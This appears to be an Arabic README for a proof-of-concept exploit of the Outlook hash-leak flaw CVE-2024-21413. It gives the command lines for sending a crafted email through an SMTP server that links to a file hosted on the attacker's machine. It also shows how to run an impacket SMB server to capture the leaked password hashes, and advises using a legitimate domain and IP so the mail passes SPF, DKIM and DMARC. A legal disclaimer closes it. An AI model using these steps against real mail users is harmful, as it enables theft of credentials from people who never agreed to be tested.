
ثغرة كشف المعلومات في Microsoft Outlook (تسريب هاش كلمة المرور) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : هو ملف الاختبار المشترك (ملف Word في هذه الحالة) من جهاز المهاجم (xx.xx.xx.xx).
لضمان الامتثال لـ SPF وDKIM وDMARC، استخدم $IP ونطاقًا شرعيين
تأكد من تثبيت مكتبة pexpect إذا لم تكن قمت بذلك بالفعل باستخدام
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
[!CAUTION] ⚠️ إخلاء مسؤولية: هام: هذا السكربت مقدم للأغراض التعليمية والاختبار الأخلاقي والاستخدام القانوني فقط. لا تستخدمه على أي نظام أو شبكة دون إذن صريح. الوصول غير المصرح به إلى أنظمة الكمبيوتر والشبكات غير قانوني، والمستخدمون الذين يُضبطون وهم يقومون بأنشطة غير مصرح بها يخضعون لإجراءات قانونية. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذا السكربت..